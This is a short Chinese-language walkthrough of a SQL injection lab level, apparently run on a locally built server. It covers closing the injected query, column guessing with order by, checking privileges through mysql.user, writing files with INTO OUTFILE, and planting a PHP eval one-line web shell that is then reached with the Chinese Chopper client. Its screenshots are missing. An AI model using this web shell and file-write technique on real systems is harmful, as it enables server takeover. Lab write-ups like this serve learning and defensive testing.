开始挑战第一关(Error Based- String)

开始之前,先介绍这关需要用到的几个函数,如下图

继续访问我们的地址,输入' “ 一些测试语句发现都没有反应

 

查看源码,是采用了单引号和双括号

这样一来就好办了,就直接利用我们的闭合来测试

继续使用order by猜解字段名,正确的数据是3个

  

 上union  select联合查询

 

靠,又没有报错,那就只能使用上面的函数来进行了,

先判断下权限  and (select count(*) from mysql.user)>0,为什么是mysql.user表,因为所有的用户都是存在mysql.user中的,返回正确

利用 into   outfile导出文件到一个txt文件中 ,使用outfile需要root权限,并且需要绝对路径,这里我是采用的本地搭建,就直接利用本地的路径了(这里为什么会提示sql语法错误,研究了很久,是出现在环境上,我是自己安装的apache和msyql)

 

查看是否写入成功,发现已成功

 

写入一句话进去<?php @eval($_POST['cmd']);?>成jpg图片,将一句话转换成16进制

 

 

 

 

  然后再使用load_file加载成php

 

 

菜刀成功链接